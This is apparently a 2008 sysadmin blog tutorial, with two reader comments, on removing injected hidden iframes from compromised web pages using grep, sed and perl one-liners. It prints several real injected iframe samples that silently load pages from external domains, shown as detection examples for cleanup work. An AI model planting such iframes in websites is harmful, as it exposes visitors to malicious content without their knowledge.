Wednesday, November 26, 2008

Cleaning Iframe Injections, Lesson 1

Pretty often we get complaints that Google has marked a site as malicious. Usually this is an iframe injection, like 90% of the time. Sometimes its a PHP shell, but that's another blog entry. First step is to grab the page. Please use curl or wget for this. You COULD just surf to it, but we're security professionals, right?

You'll find something like this:

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://pinoc.org/count.php?o=2" </iframe>
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Here's a handy perl one-liner for the pinoc domains (courtesy of http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html thanks!):

find /PATH/TO/START/FROM/ -type f | xargs perl -pi -e 's/\<iframe src\=\"http\:\/\/pinoc\.info\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>\<iframe src\=\"http\:\/\/pinoc\.org\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>//g'

To remove using sed instead:

First we make a grep string that catches all of the iframe. I like egrep:

From:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

To:

grep -HRE "<iframe src=\"http:\/\/google-analyze\.org\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>"

Note that the only difference between the strings is the domain they access. All of the files and options are the same. We use this to clean everything at once.

grep -HRE "<iframe src=\"http:\/\/.*\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>" /home/user/*

This should find ALL of the injections. Be sure to redirect the output to a text file for later. The option -lRE should make grep spit out just the names of files. Now we build our sed-line:

sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

And attach it to our list (you DID make a list of filenames by using -lRE for grep and redirecting the output, right?):

cat ~/thelist.txt | xargs sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

This will output thelist.txt into xargs. Xargs will run the sed-line on every file in thelist.txt. Be sure to fix any paths with spaces or sed will break. If we're lucky, this should result in a clean home directory for your client :). If we aren't, well, hope you backed them up first! We can do this by adding -i.ext to the sed command:

cat ~/thelist.txt | xargs sed -i.shanbak "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"


I use shanbak in case the client has other .bak files. This makes cleaning up the backups after you've verfied the iframes are gone a piece of cake and less hazardous to your client backups.

ich1 out.
Posted by at
Labels: , , , , , , , , , , ,

2 comments:

Unknown said...

Rather than using xargs, a more elegant solution would be to use read to read the entire line. This will handle filenames with spaces without issues.

Ex:
cat ~/thelist.txt | while read FILE; do sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g" "$FILE"; done

November 26, 2008 at 8:04 AM
ich1 said...

TMTOWTSAC: There's more than one way to skin a cat....

Good solution, less work.

November 26, 2008 at 8:11 AM

Post a Comment

Subscribe to: Post Comments (Atom)